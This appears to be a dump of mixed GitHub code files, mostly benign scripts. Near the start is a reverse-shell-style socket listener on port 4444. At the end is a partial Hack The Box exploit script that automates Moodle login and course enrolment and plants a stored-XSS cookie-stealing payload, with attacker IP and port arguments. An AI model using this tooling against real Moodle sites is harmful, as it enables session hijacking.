a.sort(key=lambda x: x[1], reverse=True) #전부 정보획득했으면 정렬하기\r\n b.sort(key=lambda x: x[1], reverse=True) #(이름, 출석율)의 정보 리스트, a는 출석개수가 많은것 b는적은것\r\n a= a+b #출석 정보가 작은 애들은 뒤로 빼준 것임.\r\n a.remove(('기타',0)) #기타는 첫번째로 넣어야되서 일단 삭제\r\n # print('dd',[item for item in a if (int(item[1]) < 10 and item[0] not in loaded_data[all_group[i]])])\r\n filtered_data = filtered_data+ [all_group[i]]+ [item for item in a if int(item[1]) <= 15 and item[0] not in loaded_data[all_group[i]] ]\r\n #출석율이 특정숫자보다 낮고 제거명부에 없는 애들은 명부 프린트에서 제거해줄지 검토해야함\r\n #목장이름+ 리스트형태로 명부 만들어서 마지막에 프린트해줌.\r\n\r\n #칼럼에 넣을 리스트 만들기\r\n for l in range(len(a)):\r\n temp.append(a[l][0]) #출석율 높은 순서대로 넣는것임.\r\n\r\n # print(temp)\r\n\r\n temp.insert(0,'기타') #기타 첫번째로 다시 넣어주기\r\n df=df.loc[:,temp] #데이터 프레임에 주어진 명단순서대로 넣기, 다만 to_excel안하면 큰 의미는 없음.\r\n # df=df[[temp]]\r\n\r\n\r\n if all_group[i] in loaded_data.keys():# 명단에서 제외해야할 명단이 있다면\r\n temp = making.gettruelist(temp, loaded_data[all_group[i]]) # 순서에서 제외해서 저장하기\r\n\r\n\r\n # print(all_group[i],temp) #애들 한글 명단 다시 만들때 활용할 코드부분. 한줄로 출력할때 사용\r\n if printing == 'yes': #프린트 하는게 맞으면\r\n making.make_line(all_group[i],temp) #n명씩 잘라서 표현할때\r\n\r\n\r\n #변수 초기화\r\n temp=[]\r\n a=[]\r\n b=[]\r\n\r\n if all_group[i] != '새신자':\r\n # df.to_excel(\"{}.xlsx\".format(all_group[i]))\r\n pass # 정렬화한 후 엑셀출력이 필요가 없어서 주석처리해놓음.\r\n else: #새신자이면\r\n print(\"\")\r\n print(\"이름:\")\r\n print(\"전도자(목장):\")\r\n print(\"인적사항:\")\r\n print(\"주소 생년월일 학교명 가족관계 핸드폰번호\")\r\n\r\n\r\n#전체 리스트 출력해주기, attendance초기화할때 이거 복붙하는것임.\r\nif printing =='yes':\r\n print(\"\")\r\n for m in all_group:\r\n print(m)\r\n print('불출석')\r\n print('등반자')\r\n\r\nprint(\"\")\r\nprint(\"\")\r\nprint(filtered_data)\r\n","repo_name":"Sanghyeon10/attendancebook","sub_path":"make order.py","file_name":"make order.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"11743196832","text":"import socket\n\n\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nip = \"0.0.0.0\"\nport = 4444\n\ntry:\n\tserver.bind((ip, port))\n\tserver.listen(5)\n\tprint(\"Listening in: \" + ip + \": \" + str(port))\n\tclient_socket, address = server.accept()\n\tprint(\"received from: \" + address[0])\n\twhile True:\n\t\tdata = client_socket.recv(1024)\n\t\tprint(\"\\n\" + data)\n\t\tvoce = raw_input(\"\\nvoce: \")\n\t\tclient_socket.send(voce)\n\tserver.close()\n\nexcept Exception as erro:\n\n\tprint(\"Conexao falhou\")\n\n\tprint(erro)\n\t\n\tserver.close()\n","repo_name":"Yagho38/wordlists","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73173024216","text":"#!/usr/bin/env pypy3\n\ndef ans(A):\n ret = 0\n for c in A[-1][:-1]:\n if c != 'R':\n ret += 1\n for row in A[:-1]:\n if row[-1] != 'D':\n ret += 1\n return ret\n\nT = int(input())\n\nfor _ in range(T):\n n, m = input().split()\n n = int(n)\n m = int(m)\n\n A = []\n for _ in range(n):\n A += [input()]\n\n print(ans(A))\n","repo_name":"ldct/cp","sub_path":"codeforces/663/B/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"14812274325","text":"from django.db import models\n\nimport swapper\nfrom django.core.validators import RegexValidator, MinValueValidator\nfrom formula_one.models.base import Model\nfrom r_care.constants import verification\n\n\nclass Lead(Model):\n \"\"\"\n Short Description about the model\n \"\"\"\n\n uploader = models.ForeignKey(\n to=swapper.get_model_name('kernel', 'Person'),\n related_name='leads',\n on_delete=models.CASCADE,\n )\n upvotes = models.ManyToManyField(\n swapper.get_model_name('kernel', 'Person'),\n related_name='leads_upvotes',\n blank=True\n )\n downvotes = models.ManyToManyField(\n swapper.get_model_name('kernel', 'Person'),\n related_name='leads_downvotes',\n blank=True\n )\n name = models.CharField(\n max_length=255,\n )\n contact = models.CharField(\n max_length=63\n )\n pin_code = models.IntegerField(\n validators=[\n RegexValidator(r'^[0-9]{3,9}$'),\n MinValueValidator(0),\n ],\n )\n address = models.TextField()\n verification = models.CharField(\n max_length=50,\n choices=verification,\n default='verified_by_me'\n )\n other_contact = models.CharField(\n max_length=255,\n blank=True,\n null=True\n )\n\n def __str__(self):\n \"\"\"\n Short Description about the model\n \"\"\"\n name = self.name\n verification = self.verification\n return f'Lead: Name = {name}, Verification = {verification}'\n","repo_name":"IMGIITRoorkee/omniport-app-covid-care","sub_path":"models/leads.py","file_name":"leads.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40735290409","text":"def saddle_points(matrix):\n # validate input\n for i in range(len(matrix) - 1):\n if len(matrix[i]) != len(matrix[i+1]):\n raise ValueError(\"irregular input matrix\")\n \n transposed_matrix = [list (tuple) for tuple in zip(*matrix)]\n result = set([])\n # loop through each row\n for i in range(len(matrix)):\n # loop through each number in row\n for j in range(len(matrix[i])):\n # if number is largest in the row\n if matrix[i][j] >= max(matrix[i]):\n # and if number is smallest in the column\n if transposed_matrix[j][i] <= min(transposed_matrix[j]):\n # add the position in the matrix to the result set\n result.add((i, j))\n return result\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/saddle-points/b2132f862d7b49e39ec3cb078e87b833.py","file_name":"b2132f862d7b49e39ec3cb078e87b833.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"42175026829","text":"import chess\nimport chess.engine\n\nclass VarTracker:\n def __init__(self):\n self.user_move = \"\"\n self.user_color = True\n self.output_box_text = \"\"\n self.invalid_move = False\n self.engine_move = \"\"\n self.engine_level = 5\n self.show_board = False\n self.user_resigned = False \n self.should_output_speech = False\n \n \n \n","repo_name":"caleb-bynum/blindfoldChess","sub_path":"VarTracker.py","file_name":"VarTracker.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35004917976","text":"import csv\n\nfile = open('game_data_ordered.csv')\ngame_data = csv.reader(file)\n#total_csv_rows = sum(1 for row in game_data) ## gets the total rows in csv file, \n ## but removes data for some reason\n#print(total_csv_rows)\n\nmatrix = list()\nfor row in game_data:\n matrix.append(row)\n\n\ndef ForeginKeyCascade(key: str):\n return \"FOREIGN KEY(\" + key + \") REFERENCES \" + key + \"_table(\" + key + \") ON DELETE CASCADE ON UPDATE CASCADE, \"\n\ndef ForeginKey(key: str):\n return \"FOREIGN KEY(\" + key + \") REFERENCES \" + key + \"_table(\" + key + \"), \"\n\ndef PrimaryKey(keys: str):\n return \"PRIMARY KEY(\" + keys.removesuffix(\",\") + \"),\"\n\ndef DoublePK(key1: str, key2:str):\n return \"PRIMARY KEY(\" + key1 + \", \" + key2 + \"),\"\n\ndef DoubleAttrib(attrib1: str, attrib2: str, size: str):\n return attrib1 + \" VARCHAR(\" + size + \"), \" + attrib2 + \" VARCHAR(\" + size + \"), \"\n \n#############################################\n# primarys\nNUM_ATTRIBUTES = 3\nNON_CASCADES = 1\n\ndef GetAttribs(attributeData: str):\n attributes = list(str())\n attrib = str()\n for char in attributeData:\n if(char == '~'):\n attributes.append(attrib)\n attrib = str() # Reset\n else:\n attrib += char\n attributes.append(attrib)\n return attributes\n\n\ndef CreateScheme(attributes: list):\n scheme = str()\n for i in range(0, len(attributes)):\n # Check the first character of each string in the list\n if(attributes[i][0] == '*'):\n attributes[i] = str(attributes[i]).removeprefix(\"*\")\n scheme += str(attributes[i]).removeprefix(\"*\") + \" VARCHAR(64) PRIMARY KEY,\"\n else:\n scheme += attributes[i] + \" VARCHAR(64),\"\n\n return scheme.removesuffix(\",\")\n\n\ndef CreateSchemeJunction(attributes: list):\n scheme = str()\n pkeys = str()\n fkeys = str()\n for i in range(0, len(attributes)):\n # Check the first character of each string in the list\n if(attributes[i][0] == '&'): # FK Cascade symbol\n attributes[i] = str(attributes[i]).removeprefix(\"&\") # Attribute is already a string but intellisense is retarded\n scheme += attributes[i] + \" VARCHAR(64),\"\n fkeys += ForeginKeyCascade(attributes[i]) \n pkeys += attributes[i] + \",\"\n elif(attributes[i][0] == '#'):# FK NON Cascade symbol\n attributes[i] = str(attributes[i]).removeprefix(\"#\")\n scheme += attributes[i] + \" VARCHAR(64),\"\n fkeys += ForeginKey(attributes[i])\n pkeys += attributes[i] + \",\"\n else:\n scheme += attributes[i] + \" VARCHAR(64),\"\n\n scheme += PrimaryKey(pkeys) + fkeys.removesuffix(\", \")\n return scheme\n\n\ndef CreateSchemeInsert(attributes: list):\n insertScheme = str()\n for attribute in attributes:\n insertScheme += attribute + \",\"\n return \" (\" + insertScheme.removesuffix(\",\") + \")\"\n\n\ndef CreateTableName(attributes: list):\n assert len(attributes) > 0\n\n return attributes[0] + \"_table\"\n\ndef CreateTableNameJunction(attributes: list):\n assert len(attributes) > 1\n\n return attributes[0] + \"_\" + attributes[1] + \"_table\"\n \n\nprint(\"*****************************************************\")\n# def LoadData(numJunctions: int):\nnumTables = len(matrix[0]) # matrix[0] should be an argument\nnumJunctions = 3\nnumPrimaryTables = numTables - numJunctions\n\n# For each table in matrix[0]\nfor i in range(0, numTables):\n attributes = GetAttribs(matrix[0][i])\n if(i < numPrimaryTables):\n scheme = CreateScheme(attributes)\n print(scheme) # for testing purpose now since no sql intalled\n tableName = CreateTableName(attributes)\n else:\n scheme = CreateSchemeJunction(attributes)\n print(scheme)\n tableName = CreateTableNameJunction(attributes)\n\n print(tableName)\n # CreateTable(tableName, scheme)\n ### Add () around scheme when creating table otherwise error\n #__TableInsert() does this automatically anyway ´, only use when testing\n\n insertScheme = CreateSchemeInsert(attributes)\n\n for j in range(1, len(matrix)):\n values = str()\n attribValues = GetAttribs(matrix[j][i])\n # hack\n if(len(attribValues[0]) < 1):\n break\n\n if(len(attribValues) == 1):\n values = \" VALUES(\" + \"'\" + attribValues[0] + \"')\"\n print(\"INSERT INTO \" + tableName + insertScheme + values)\n else:\n NUM_ATTRIBUTES = len(attributes) - 1\n numAdded = 0\n for k in range(1, len(attribValues)):\n values += \"'\" + attribValues[k] + \"'\" + \",\"\n numAdded += 1\n if(numAdded == NUM_ATTRIBUTES):\n numAdded = 0\n values = \" VALUES(\" + \"'\" + attribValues[0] + \"',\" + values\n values = values.removesuffix(\",\")\n values += \")\"\n print(\"INSERT INTO \" + tableName + insertScheme + values)\n values = str()\n \n\n\n\n\n\n \n\n\n\n\n\n\n\"\"\" schemas = list(str())\ntmpStr = str()\nfor i in range(0, NUM_ATTRIBUTES):\n if (i == 0):\n tmpStr += matrix[0][0] + \" VARCHAR(64) PRIMARY KEY,\"\n else:\n tmpStr += matrix[0][i] + \" VARCHAR(64),\"\nschemas.append(tmpStr.removesuffix(\",\"))\n\nfor i in range(NUM_ATTRIBUTES, len(matrix[0])):\n tmpStr = str()\n tmpStr += matrix[0][i] + \" VARCHAR(64) PRIMARY KEY\"\n schemas.append(tmpStr)\n tmpStr = str() # Reset string\n tmpStr += DoubleAttrib(matrix[0][0], matrix[0][i], \"64\")\n tmpStr += DoublePK(matrix[0][0], matrix[0][i])\n tmpStr += ForeginKeyCascade(matrix[0][0])\n if (i < NUM_ATTRIBUTES + NON_CASCADES):\n tmpStr += ForeginKey(matrix[0][i])\n else:\n tmpStr += ForeginKeyCascade(matrix[0][i])\n schemas.append(tmpStr.removesuffix(\", \"))\n\nprint(\"------------------------------------------\")\nfor schema in schemas:\n print(schema) \"\"\"\n\n \n#ON DELETE, ON CASCADE <<------ CHECK THIS OUT # https://www.javatpoint.com/mysql-on-delete-cascade #####\n\n'''SYNTAX FOR FOREIGN KEY'''\n# column CHAR(64), FOREIGN KEY(column) REFERENCES table(column-1)\n\n'''Syntax for composite key'''\n# column-1 CHAR(64), column-2 CHAR(64), PRIMARY KEY (column-1, column-2)\n\n'''Our table syntax should look like this: '''\n# title CHAR(64) PRIMARY KEY,year CHAR(64),publisher CHAR(64)\n# platform_name CHAR(64) PRIMARY KEY\n# title CHAR(64), platform_name CHAR(64), PRIMARY KEY(title, platform_name), FOREIGN KEY(title) REFERENCES game_info(title), FOREIGN KEY(platform_name) REFERENCES platform(platform_name)\n# genre_name CHAR(64) PRIMARY KEY\n# title CHAR(64), genre_name CHAR(64), PRIMARY KEY(title, genre_name), FOREIGN KEY(title) REFERENCES game_info(title), FOREIGN KEY(genre_name) REFERENCES genre(genre_name)\n# store_name CHAR(64) PRIMARY KEY\n# title CHAR(64), store_name CHAR(64), price VARCHAR(10), PRIMARY KEY(title, store_name), FOREIGN KEY(title) REFERENCES game_info(title), FOREIGN KEY(store_name) REFERENCES store(store_name)\n\n\n'''END RESULT SHOULD BE LIKE THIS (optional table names, if we change remember to change all occurences!!)'''\n# CREATE TABLE game_info (title CHAR(64) PRIMARY KEY,year CHAR(64),publisher CHAR(64))\n\n# CREATE TABLE platform (platform_name CHAR(64) PRIMARY KEY)\n# CREATE TABLE game_platform (title CHAR(64), platform_name CHAR(64), PRIMARY KEY(title, platform_name), FOREIGN KEY(title) REFERENCES game_info(title), FOREIGN KEY(platform_name) REFERENCES platform(platform_name))\n\n# CREATE TABLE genre (genre_name CHAR(64) PRIMARY KEY)\n# CREATE TABLE game_genre (title CHAR(64), genre_name CHAR(64), PRIMARY KEY(title, genre_name), FOREIGN KEY(title) REFERENCES game_info(title), FOREIGN KEY(genre_name) REFERENCES genre(genre_name))\n\n# CREATE TABLE store (store_name CHAR(64) PRIMARY KEY)\n# CREATE TABLE game_store (title CHAR(64), store_name CHAR(64), price VARCHAR(10), PRIMARY KEY(title, store_name), FOREIGN KEY(title) REFERENCES game_info(title), FOREIGN KEY(store_name) REFERENCES store(store_name) ON DELETE CASCADE)\n\n\n\n\n\n# Why not use title TEXT instead of CHAR(64)? \n# TEXT only occupies the actual lenght of the text + 2 bytes\n# CHAR size in bytes is number of char\n# VARCHAR size in bytes is number of chars used +1\n# Isn't it better to dynamically allocate memory instead?\n# CHAR allocates a set chunk?\n\n# if we use CHAR, Mysql pads the remainder of spaces that are not used\n# VARCHAR are not padded, stores only the lenght of the string + 1 or 2 bytes for a prefix\n# TEXT, mysql doesnt support text data types well. Can lead to creation of a temporary table\n# on disk instead of memory, which leads to significant performance penalties.\n'''https://blog.cpanel.com/varchar-vs-text-for-mysql-databases/'''","repo_name":"prevLanky/1DV503-programming-assignment-2","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"17200179125","text":"'''\nEvaluates the performance of a CoNLL format annotated file. Also shows the errors that were found in the file.\nThe file should have three columns (token, true tag, predicted tag).\n\nUsage:\n conll_evaluate_results.py [options]\n\nArguments:\n Annotated CoNLL file using the model\n Output text fiile where to save the analysis\n\n --window=

If equal to \"single\" print the single tokens that were misclassified. [default: single]\n If it is an int, show the previous and following n tokens around the error.\n --type_error= What type of errors to show. For ex., \"B-PER,O\" will show the errors when\n the true label was B-PER but the predicted label is O (default: None)\n'''\n\nimport pandas as pd\nfrom argopt import argopt\n\nfrom seqeval.metrics import classification_report, f1_score\n\nfrom src.results.confusion_matrix_pretty_print import print_confusion_matrix\n\n\ndef print_results(y_true, y_pred):\n classif_report = classification_report(y_true, y_pred)\n print(classif_report)\n\n fscore = f1_score(y_true, y_pred)\n print(f\"F-score (micro): {fscore:.2f}\")\n fscore_str = f\"F-score (micro): {fscore:.2f}\"\n\n labels = list(set(y_true))\n labels.pop(labels.index(\"O\"))\n labels = sorted(labels, key=lambda x: (x[2:], x[0])) + [\"O\"]\n\n cm = print_confusion_matrix(y_true=y_true, y_pred=y_pred,\n labels=labels,\n return_string=True)\n print(cm)\n\n return classif_report, fscore_str, cm\n\n\ndef print_errors(results_df: pd.DataFrame, type_error=None, window=\"single\", return_string=False):\n \"\"\"\n Show the errors found in the read CoNLL file\n :param results_df: Input CoNLL file to test\n :param type_error: Dict containing the types of errors to show: ex.: {\"true\": \"B-PER_NOM\", \"pred\": \"O\"}.\n Show all the errors by default\n :param window: If \"single\", show the single misclassified token, if an int, show the previous and next n tokens\n :return_string: If True, print AND return a string with the results\n :return:\n \"\"\"\n from io import StringIO\n import sys\n\n errors_string = StringIO()\n old_stdout = sys.stdout\n if return_string:\n errors_string = StringIO()\n sys.stdout = errors_string\n\n results_df = results_df.fillna(\"\")\n results_df.index = range(1, len(results_df) + 1)\n if type_error:\n errors_idx = results_df[(results_df[\"true_tag\"] == type_error[\"true\"]) &\n (results_df[\"pred_tag\"] == type_error[\"pred\"])].index\n\n else:\n errors_idx = results_df[results_df[\"pred_tag\"] != results_df[\"true_tag\"]].index\n\n if window == \"single\":\n final_df = results_df.loc[errors_idx]\n print(final_df.to_string())\n elif isinstance(window, int):\n lower_bound, upper_bound = (-1, -1)\n for idx in errors_idx:\n if lower_bound < idx < upper_bound:\n continue\n lower_bound = max(0, idx - window)\n upper_bound = min(errors_idx.max(), idx + window)\n window_df = results_df.loc[lower_bound:upper_bound, :]\n print(f\"Line {idx} of the CoNLL file:\", end=\"\\n\\t\")\n print(window_df, end=\"\\n\\n\")\n\n if return_string:\n sys.stdout = old_stdout\n return errors_string.getvalue()\n\n\ndef main(conll_file_path, output_results_path, type_error, window):\n # Load conll file\n results_df = pd.read_csv(conll_file_path, delim_whitespace=True, names=[\"token\", \"true_tag\", \"pred_tag\"],\n skip_blank_lines=False)\n y_true = results_df[\"true_tag\"].dropna().values.tolist()\n y_pred = results_df[\"pred_tag\"].dropna().values.tolist()\n results = print_results(y_true=y_true, y_pred=y_pred)\n print()\n errors = print_errors(results_df=results_df, type_error=type_error, window=window, return_string=True)\n print(errors)\n results_errors = list(results) + [errors]\n\n with open(output_results_path, \"w\") as outo:\n for info in results_errors:\n outo.write(str(info))\n outo.write(\"\\n\\n\")\n\n\nif __name__ == '__main__':\n parser = argopt(__doc__).parse_args()\n conll_file_path = parser.conll_file_path\n output_results_path = parser.output_results_path\n window = parser.window\n if window.isdigit():\n window = int(window)\n\n if parser.type_error:\n type_error = parser.type_error.split(\",\")\n type_error = {\"true\": type_error[0], \"pred\": type_error[1]}\n else:\n type_error = parser.type_error\n\n main(conll_file_path=conll_file_path,\n output_results_path=output_results_path, type_error=type_error,\n window=window)\n","repo_name":"etalab-ia/pseudo_conseil_etat","sub_path":"src/results/conll_evaluate_results.py","file_name":"conll_evaluate_results.py","file_ext":"py","file_size_in_byte":4859,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"68"} +{"seq_id":"14414388300","text":"# python3\n\nfrom flask import Flask, render_template, request\nfrom PIL import Image\nfrom sklearn import cluster as sk_cluster\nimport numpy as np\nimport random\nimport datetime\n\nnp.set_printoptions(threshold=np.nan)\n\napp = Flask(__name__, static_url_path = \"/images\", static_folder = \"images\")\n\nw, h = 6, 1024;\nx = 0\nsum_data = 0\nis_looping = {}\nrgb_im = {}\nim = {}\nlist_data = [[0 for x in range(w)] for y in range(h)] #list_data[[6]1024]\n\ncolors = [\"red\",\"green\",\"blue\",\"orange\",\"purple\",\"pink\",\"yellow\"]\n\nfor k in range(0,6):\n if k == 5:\n url = 'images/gb'+str(k+2)+'.GIF'\n else :\n url = 'images/gb'+str(k+1)+'.GIF'\n \n im[k] = Image.open(url)\n rgb_im[k] = im[k].convert('RGB')\n width, height = im[k].size\n\n# get pixel change to grayscale then enter to array\nfor i in range(0,width):\n for j in range(0,height):\n for k in range(0,6):\n pixel_im = rgb_im[k].getpixel((i,j))\n red_im = pixel_im[0]\n green_im = pixel_im[1]\n blue_im = pixel_im[2]\n gray_im = (red_im + green_im + blue_im)/3\n\n list_data[x][k] = gray_im\n\n is_looping[x] = True\n x = x + 1\n\n@app.route('/')\ndef main():\n return render_template('index.html')\n\n@app.route('/process', methods=['GET', 'POST'])\ndef process():\n if request.method =='POST':\n cluster = request.form['cluster']\n cluster_tmp = []\n x = 0\n\n result = sk_cluster.AgglomerativeClustering(n_clusters=int(cluster),linkage='complete').fit_predict(list_data)\n\n print(result)\n\n # for x in range(0,width*height):\n # for y in range(0,int(cluster)):\n # if result[x] == y:\n # cluster_tmp.append([])\n # cluster_tmp[y].append(x)\n\n # for x in range(0,int(cluster)):\n # print('Cluser '+str(x)+' : '+str(cluster_tmp[x]))\n\n # make image\n img = Image.new('RGB', [32,32], 0x000000)\n # loop = 0\n for i in range(0,width):\n for j in range(0,height):\n if result[x] == 0:\n img.putpixel((i,j),(255,0,0))\n elif result[x] == 1:\n img.putpixel((i,j),(0,255,0))\n elif result[x] == 2:\n img.putpixel((i,j),(0,0,255))\n elif result[x] == 3:\n img.putpixel((i,j),(255,255,0))\n elif result[x] == 4:\n img.putpixel((i,j),(255,0,255))\n elif result[x] == 5:\n img.putpixel((i,j),(0,255,255))\n elif result[x] == 6:\n img.putpixel((i,j),(0,0,0))\n else:\n img.putpixel((i,j),(255,255,255))\n\n x += 1\n\n now = datetime.datetime.now()\n img.save('images/'+str(now)+'.jpg')\n # img.show()\n url_image = str(now)+'.jpg'\n\n return render_template('hasil.html', cluster=cluster, url_image=url_image)\n\n else:\n return \"ok\"\n\n# run app\nif __name__ == \"__main__\":\n app.run()","repo_name":"adiputra17/multiband-image-clustering-py","sub_path":"app_lib.py","file_name":"app_lib.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"22496982931","text":"from setuptools import setup\n\npackage_name = 'turtlesim'\n\nsetup(\n name=package_name,\n version='0.0.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='luana',\n maintainer_email='luana@todo.todo',\n description='TODO: Package description',\n license='TODO: License declaration',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n \"draw_exe = turtlesim.draw:main\"\n ],\n },\n)","repo_name":"luanaparra/modulo6_ponderados","sub_path":"semana1/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36786421586","text":"#!/usr/bin/python3\n# Creator: brutuspt\n\nimport urllib.parse\nimport requests\nimport argparse\nimport os, sys\nimport base64\nfrom bs4 import BeautifulSoup\n\n\nparser = argparse.ArgumentParser(description='Process some integers.')\nparser.add_argument(\"-t\", \"--target\", help=\"Target Domain Name/IP\", required=True)\nparser.add_argument(\"-i\", \"--IP\", help=\"Attacker IP (Where to catch the rev shell)\", required=True)\nparser.add_argument(\"-p\", \"--port\", help=\"Attacker Port (Where to catch the rev shell)\", required=True)\nparser.add_argument(\"-U\", \"--username\", help=\"Username\", required=True)\nparser.add_argument(\"-P\", \"--password\", help=\"Password\", required=True)\n#parser.add_argument(\"-wp\", \"--webport\", help=\"Attacker Web Server Port (Where to server the payloads)\", required=True)\n\n\nargs = parser.parse_args()\n\ns = requests.Session()\n\"\"\"\ndef register (target, username, password):\n # Registers the user in the Moodle platform\n \n url = \"http://%s/moodle/login/signup.php\" % target\n \n headers = { \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\" }\n data = { \n \"sesskey\": \"LgTBsIGFGU\",\n \"_qf__login_signup_form\": 1,\n \"mform_isexpanded_id_createuserandpass\": 1,\n \"mform_isexpanded_id_supplyinfo\": 1, \n \"username\" : username,\n \"password\" : password, \n \"email\" : str(username)+\"@student.schooled.htb\",\n \"email2\" : str(username)+\"@student.schooled.htb\", \n \"firstname\": \"brutuspt\",\n \"lastname\": \"brutuspt\",\n \"city\": \"Lisboa\",\n \"contry\": \"PT\",\n \"submitbutton\" : \"Create my new account\" \n }\n \n proxies = { \"http\" : \"127.0.0.1:8080\" }\n \n r = s.post(url, headers=headers, data=data, proxies=proxies)\n \n if \"Please click on the link below to confirm your new account.\" in r.text:\n print(\"[INFO] \" + str(username) + \" was successfully registered in Moodle!\")\n else:\n print(\"[ERROR] Registration Failed!\")\n sys.exit(1)\n \n\n soup = BeautifulSoup(r.text, 'html.parser')\n\n for data in soup.find_all('input'):\n if str(username) in data:\n token = data.get(\"value\")\n print(token)\n\"\"\"\n\ndef login(target, username, password):\n #login function\n \n #proxies = { \"http\" : \"127.0.0.1:8080\" }\n headers = { \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\" }\n url = \"http://%s/moodle/login/index.php\" % target\n \n print(\"[INFO] Trying to grab the logintoken first...\")\n r = s.get(url, proxies=proxies)\n\n soup = BeautifulSoup(r.text, 'html.parser')\n\n login_token = soup.find(\"input\", {\"name\":\"logintoken\",\"type\": \"hidden\"}).get(\"value\")\n print(\"[SUCCESS] Grabbed!! Login Token: \" + str(login_token))\n \n print(\"[INFO] Using the login token to login into Mooddle...\")\n data = { \"logintoken\" : str(login_token), \"username\": username, \"password\" : password }\n \n r = s.post(url, data=data, headers=headers) # proxies=proxies\n if \"Dashboard\" in r.text:\n print(\"[INFO] Login using the \" + str(username) + \" user was successful!\")\n else:\n print(\"[ERROR] Login Failed!\")\n sys.exit(1)\n \n print(\"[INFO] Trying to grab the sesskey...\")\n\n # grabbing the sesskey...pain in the ass\n soup = BeautifulSoup(r.text, 'html.parser')\n sesskey = str(soup(\"script\")[1]).split(\"sesskey\")[1][3:13]\n print(\"[SUCCESS] sesskey extracted successfully: \" + str(sesskey))\n return sesskey\n\n\ndef enroll_maffs(target, sesskey):\n # This function will be responsible for signing my user into the Mathematics class\n \n #proxies = { \"http\" : \"127.0.0.1:8080\" }\n headers = { \n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\",\n \"Origin\": \"http://\"+ str(target),\n \"Referer\": \"http://\"+ str(target) + \"/moodle/enrol/index.php?id=5\",\n \"Connection\": \"close\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"DNT\": \"1\",\n \"Sec-GPC\": \"1\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Accept-Language\": \"en-US,en;q=0.5\"\n\n }\n url = \"http://%s/moodle/enrol/index.php\" % target\n\n print(\"[INFO] Requesting access to the Maffs class...\")\n\n data = { \"id\" : \"5\", \"instance\": \"12\", \"sesskey\": sesskey, \"_qf__12_enrol_self_enrol_form\" : \"1\", \"mform_isexpanded_id_selfheader\" : \"1\", \"submitbutton\" : \"Enrol me\"}\n \n r = s.post(url, data=data, headers=headers, allow_redirects=True) # proxies=proxies\n #print(r.text)\n \n if \"You are enrolled in the course.\" in r.text:\n print(\"[SUCCESS] The user was successfully enrolled into the Maffs class\")\n else:\n print(\"[ERROR] It was not possible to enroll the user!\")\n \n\n\ndef exploit_xss(target, username, sesskey, ip, port):\n # Create the XSS payload\n # POST the payload\n # Wait for the target to trigger it\n # Retrieve the cookie\n\n payload = \"\"\n\n #proxies = { \"http\" : \"127.0.0.1:8080\" }\n headers = { \n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\",\n \"Origin\": \"http://\"+ str(target),\n \"Referer\": \"http://moodle.schooled.htb/moodle/user/edit.php?id=28&returnto=profile\",\n \"Connection\": \"close\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"DNT\": \"1\",\n \"Sec-GPC\": \"1\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Accept-Language\": \"en-US,en;q=0.5\"\n\n }\n\n \n url = \"http://%s/moodle/user/edit.php\" % target\n\n print(\"[INFO] Editing the user profile, more specifically, the moodlenetprofile parameter\")\n\n data = \"course=1&id=28&returnto=profile&id=28&course=1&mform_isexpanded_id_moodle_picture=1&sesskey=\" + sesskey + \"&_qf__user_edit_form=1&mform_isexpanded_id_moodle=1&mform_isexpanded_id_moodle_additional_names=0&mform_isexpanded_id_moodle_interests=0&mform_isexpanded_id_moodle_optional=0&firstname=brutuspt&lastname=lal&email=brutuspt%40student.schooled.htb&maildisplay=2&moodlenetprofile=\" + urllib.parse.quote(payload) + 